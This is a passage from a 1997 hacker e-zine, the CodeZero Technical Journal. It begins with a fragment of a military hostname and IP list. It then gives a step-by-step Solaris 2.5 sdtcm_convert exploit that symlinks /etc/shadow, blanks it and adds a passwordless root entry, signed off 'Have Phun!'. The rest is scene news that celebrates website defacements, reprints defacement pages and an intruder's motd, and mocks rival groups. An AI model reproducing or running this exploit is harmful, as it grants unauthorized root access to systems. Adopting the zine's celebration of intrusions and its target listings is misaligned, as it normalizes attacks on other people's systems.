dmmis-wr.af.mil dmmis-wr.arpa 26.10.0.83 robins-am1.af.mil robins-am1.arpa 26.11.0.83 kngtrf.navy.mil kngtrf.arpa 26.15.0.205 kngtrf.navy.mil kngtrf.arpa 26.12.0.83 moody-am1.af.mil moody-am1.arpa 26.13.0.83 robins-piv-2.af.mil 26.15.0.83 robins-pc3.af.mil robins-pc3.arpa 26.16.0.83 remis-wr.af.mil 26.2.0.84 dahlgren.mt.ddn.mil nswc-mil-tac.arpa 26.3.0.84 oas.nswc.navy.mil nswc-oas.arpa ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 10. Solaris 2.5 Calendar Exploit : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Umm, firstly check to see if /usr/dt/bin/sdtcm_convert exists, then edit this by replacing with your username on the host. Also, if /etc/shadow doesnt exist, just change all the /etc/shadow entries here to /etc/passwd Oh yeah, d0nut type the % signs :) % ln -s /etc/shadow /tmp/calorig. % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 % ls -l /etc/shadow % chmod 644 /etc/shadow % cp /dev/null /etc/shadow % ls -l /etc/shadow % echo "root::6445::::::" >> /etc/shadow % su Have Phun! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 11.CodeZero World News : fr1day / od^phreak ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Web Sites Start To Drop Like Flies! ----------------------------------- On the 16th of March the following sites were reported to have been hacked : http://www.catch22.com <---- wh0 gn0s? http://www.hawkee.com <---- wh0 gn0s? http://www.jetpack.com <---- Had pikshure of SiN on it. http://www.potatoe.com <---- Had pikshure of SiN on it. Links and Greets to SiN members were found in all cases but www.hawkee.com Here is the index.html that was found on http://www.catch22.com and http://www.hawkee.com , which were the biggest of the four hacked... ThIS Is a StIcKUP! dRoP It pUnk, fBi!!!

ThiS SiTe HaS bEeN hIjAcKeD!


5 17 6 7 2 7 20 17


Hi Spartan

NeonUnix's SPlOItZ SeCTIoN

The L0phT

The PaNcReaS

The Crackhouse

The UnDerGrOunD


HAcK tHE FuCkEn PlaNeT, GrEetS GoEs T0o :

Shivers / X-Jester / Sciri / Deprave / Zophar / WilD_FirE / BoMbJaCk / Jester / DarkWay / Virtual_Kermit / Tricky_Dicky

AnYoNe I FerGot, S0rry :)


If you want, copy and load that into NutScrape, or the client you use, then you will see its true majesty, the numbers at the top that flash will be decyphered soon, maybe they form a name, or even an ip? who knows? This was recently found on CTfire... ------------------------------------ Taken from www.ctfire.com : News About mIRC & CTFire This Section Is Reserved For The Latest Information On mIRC And CTFire. If You Have Any News, Please Let Me Know. Hacking hawkee.com - In case you didn't know, a number of Nethosting.com servers including hawkee.com was hacked into. CTFire views hacking as a very serious offense and feels that the people responsible should be dealt with quickly and efficently. Anyone with any information should contact Hawkee. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ altair.herts.ac.uk, the plot thickens... ---------------------------------------- Darkfool of SiN (#sin on undernet) has been doing alot hasnt he? we caught up with him and found he knew alot about altair.herts.ac.uk, we soon found that altair has now gone down, and that the last /etc/motd was this... ___ -_ _- ___ _--~~~#####// \\#####~~~--_ _-~##########// ( ) \\##########~-_ -############// :\^^/: \\############- _~############// (@::@) \\############~_ ~#############(( \\// ))#############~ -###############\\ (oo) //###############- -#################\\ / "" \ //#################- -###################\\/ \//###################- _#/:##########/\######( /\ )######/\##########:\#_ :/ :#/\#/\#/\/ \#/\##\ : : /##/\#/ \/\#/\#/\#: \: " :/ V V " V \#\: : : :/#/ V " V V \: " " " " / : : : : \ " " " " ( : : : : ) __\ : : : : /__ (vvv(VVV)(VVV)vvv) You thought ure data was safe........ DO SIN http://www.pancreas.com/SIN Infected ? http://www.infected.com Defvac http://www.defvac.com Now, is it not clear to you, the humble reader, that there is a link between the /etc/motd on altair and the www.jetpack.com and www.potatoe.com index.html files that were uploaded by "DaFool" ? heh, well i guess he's innoncent until proven guilty :D even if he does put EXACTLY the same urls on all his hacks... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PHEAR THE ELH! -------------- The ELH *FINALLY* realised their page had been hacked, and soon found out, through this magazine :) who did it, od^phreak of #hackteach on the undernet, they them preceeded to show off their lameness in an attempt to mailbomb od, this didnt work very effectively, as they didnt use remailers like anyone with a GRAIN of sense would, and so od has their emails and isp's from which he could mail the admin and kill their accounts, nice move Extremely Lame Hackers, you're ereet you are! LordNemesis, Co-Founder has also quit, leaving DeathVege (imp0ster) to lead the group. good luck to him :) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ od^phreak does it again... -------------------------- od^phreak of infected (www.infected.com) hacked most of the www pages on www.ilf.net AGAIN, chaos@ilf.net (admin) obviously has no clue at all, and good 'ole od found yet another hole in chaoses k-r4d 'l33+ linux system, the www.ilf.net page didt get changed, but the following did... www.ilf.net/elh www.ilf.net/-=x9=- www.ilf.net/toast www.ilf.net/god@rkey lets see od^phreak hack nasa next shall we? seeing hes kinda glued to ilf.net is linux the only OS he has any skills with? we shall see... In the meantime, the ELH have moved to geocities, update soon. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ AWOL News. ---------- AWOL, the [A]nnihialation of [W]indoze [O]perators [L]td. Based in the UK, Now has a 4 storey, 200 roomed building, p-150 / 32mb ram / 1.4gb / 33.6 laptop (with added biohazard sticker), 2 phone lines, and a bigger system on the way, Member List : Wild_fiRe - phreaker, set up all the fone lines BoMbJaCk - general systems specialist Tokyo_Joe - Solaris specialist Jester - phreaker. Grandpa - electronics expert, builds boxes etc. Latest News : Wild_fiRe installs windoze '95 onto the laptop, which kills the linux boot partition, fucks the bios and now the system bios asks for a password, so the system is in a bad way. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Od^Phreak releases WINUX. ------------------------- Winux is basically linux that can be run from windoze '95 or windoze NT, you can download it from this site, this URL *IS* case sensitive : http://ilf.net/hemp/demon/Winux/ Download all the files there, then follow the instructions, I think its got potential. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Infected Prepares for the Release of New programs. -------------------------------------------------- In the next couple of months Infected will be releases some new cool programs dealing with mostly encryption. These will include some PGP programs and a program called "Utopia" by The Messiah, who is also a member of SiN, currently Infected seem to be going through a rough patch, as certain members have left... infected www site : www.infected.com ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 12.News Conclusion : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Seems alot has been going on this month, especially with wesite hacking, ELH have proved to us again, that they are, lets just say, Extremely Lame Hackers, maybe you would like to visit their page? http://www.ilf.net/elh/ or KRACKs page at http://ilf.net/hemp/, i found that od^phreak and Zophar own the account on ilf.net for hemp, i still cannot understand why KRACK is found there, seeing it is one of the lamest groups i have seen, but anyway, until next month... For next month, I would like to publish a list of *good* MUDS and BBS's, so please mail suggestions to codezero@digi-gram.com cheers, T_K ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ The CodeZero Technical Journal, April 1997, Issue 002 ³± ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Official Sponsor Of The CodeZero Technical Journal ==============> THE CrAckHouSe <=============== --------------> WWW.CRACKHOUSE.COM <--------------- --------------> IRC.CRACKHOUSE.COM <--------------- ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ "Breathe Tha Pressure, Come Play Muh Game I'll Test Ya!" Tetsu Khan, CodeZero. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Official CodeZero Technical Journal Distribution Site ===============> http://www.neonunix.org/codezero/ <===================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ